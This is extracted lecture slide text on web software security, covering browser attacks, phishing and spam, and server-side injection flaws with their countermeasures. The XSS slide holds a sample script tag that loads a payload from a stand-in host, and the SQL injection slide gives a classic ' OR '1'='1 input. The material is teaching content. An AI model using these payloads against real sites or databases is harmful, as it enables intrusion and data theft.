Web Software Security

Browser Vulnerabilities
• Security issues for browsers arise from several
complications to that simple description, such as
these:
• A browser often connects to more than the one
address shown in the browser’s address bar.
• Fetching data can entail accesses to numerous
locations to obtain pictures, audio content, and
other linked content.
• Browser software can be malicious or can be
corrupted to acquire malicious functionality.
• Popular browsers support add-ins, extra code to
add new features to the browser, but these add-ins
themselves can include corrupting code.
Browser Vulnerabilities

3
 Browser Attack Types

• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

4
Man-in-the-Browser

5
 Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a USB
port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

6
 Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input
 Program Download Substitution
• Attacker creates a page with seemingly
innocuous and desirable programs for download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware
User-in-the-Middle
• Using click-bait to
trick users into solving
CAPTCHAs on
spammers’ behalf
 Successful Authentication
• The attacks listed above are largely failures of
authentication
• Can be mitigated with
– Shared secret
– One-time password
– Out-of-band communication
Fake Website
Fake Code
Tracking Bug
Clickjacking
 Drive-By Download
• Code is downloaded, installed, and
executed on a computer without the user’s
knowledge
• May be the result of clickjacking, fake
code, program download subsitution, etc.
 Cross-Site Scripting (XSS)
• Tricking a client or server into executing scripted
code by including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just
like user inputs, so they can take over web pages
similarly to the way buffer overflow attacks can take
over programs

Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>
 SQL Injection
• Injecting SQL code into an exchange
between an application and its database
server
• Example:
– Loading an SQL query into a variable, taking
the value of acctNum from an arbitrary user
input field:
– QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " ';
"

– The same query with malicious user input:

– QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1';
"
 Dot-Dot-Slash
• Also known as “directory traversal,” this is
when attackers use the term “../” to access
files that are on the target web server but
not meant to be accessed from outside
• Most commonly entered into the URL bar
but may also be combined with other
attacks, such as XSS
 Server-Side Include (SSI)
• SSI is an interpreted server-side scripting
language that can be used for basic web
server directives, such as including files
and executing commands
• As is the case with XSS, some websites
are vulnerable to allowing users to execute
SSI directives through text input
 Countermeasures to Injections
• Filter and sanitize all user input
– Need to account for every potentially valid
encoding
• Make no assumptions about the range of
possible user inputs—trust nothing, check
everything
• Use access control mechanisms on
backend servers, such as “stored
procedures”
 Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
– Advertising
• Pharmaceuticals
• Stocks
– Malicious code
– Links for malicious websites
• Spam countermeasures
– Laws against spam exist but are generally ineffective
– Email filters have become very effective for most spam
– Internet service providers use volume limitations to make
spammers’ jobs more difficult
21
 Phishing
• A message that tries to trick a victim into
providing private information or taking
some other unsafe action
• Spear phishing: A targeted attack that is
personalized to a particular recipient or set
of recipients
 Countermeasures
• User education
– Limited effectiveness and very subject to co-
evolution with attacks
• PGP and S/MIME
– Cryptographic solutions that have seen very
limited adoption after years on the market
 Summary
• As web browsers have become a primary focus of
users and taken on greater functionality, they’ve
become a focus of many types of attack
• Browser and website weaknesses are often the
result of some form of poor authentication
• Many attackers focus on tricking users with fake
websites, misleading applications, and phishing
emails
• On the server side, injection attacks are a key
concern, and countermeasures to prevent them are
critical